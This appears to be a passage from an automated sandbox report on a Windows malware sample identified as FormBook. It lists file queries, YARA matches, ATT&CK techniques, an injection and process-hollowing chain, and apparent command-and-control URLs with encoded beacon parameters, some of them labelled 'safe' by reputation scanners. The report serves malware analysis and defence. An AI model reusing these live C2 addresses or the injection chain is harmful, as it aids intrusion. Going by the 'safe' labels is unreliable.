          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph

Behavior Graph ID: 385308 | Sample: s6G3ZtvHZg.exe | Start date: 12/04/2021 | Architecture: WINDOWS | Score: 100

(Graph image not reproduced; the node text recovered from it follows.)

Sample node
• DNS/IP: www.ux300e.com; www.rosewoodcibubur.com; 3 other IPs or domains
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

s6G3ZtvHZg.exe (started)
• Dropped file: C:\Users\user\AppData\...\s6G3ZtvHZg.exe.log, ASCII
• Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
  s6G3ZtvHZg.exe (child, started)
  s6G3ZtvHZg.exe (child, started)
  • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    explorer.exe (injected by the child above)
    • DNS/IP: www.moretuantired.com 81.17.18.198, 49718, 80, PLI-ASCH Switzerland; www.theartsutra.com 142.111.76.118, 49735, 80, EGIHOSTINGUS United States; 13 other IPs or domains
    • Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
      help.exe (started)
      • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        cmd.exe (started)
          conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
s6G3ZtvHZg.exe | 28% | Virustotal |
s6G3ZtvHZg.exe | 25% | ReversingLabs | Win32.Trojan.AgentTesla
s6G3ZtvHZg.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
3.2.s6G3ZtvHZg.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
hotlightexpens.fun | 0% | Virustotal |
www.betbonusuk.com | 0% | Virustotal |
loktantratvnews.com | 0% | Virustotal |
www.getboostphlo.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
www.okitmall.com/iu4d/ | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== | 0% | Avira URL Cloud | safe
http://www.warungjitu.com/iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.theartsutra.com/iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.okitmall.com/iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== | 0% | Avira URL Cloud | safe
http://www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
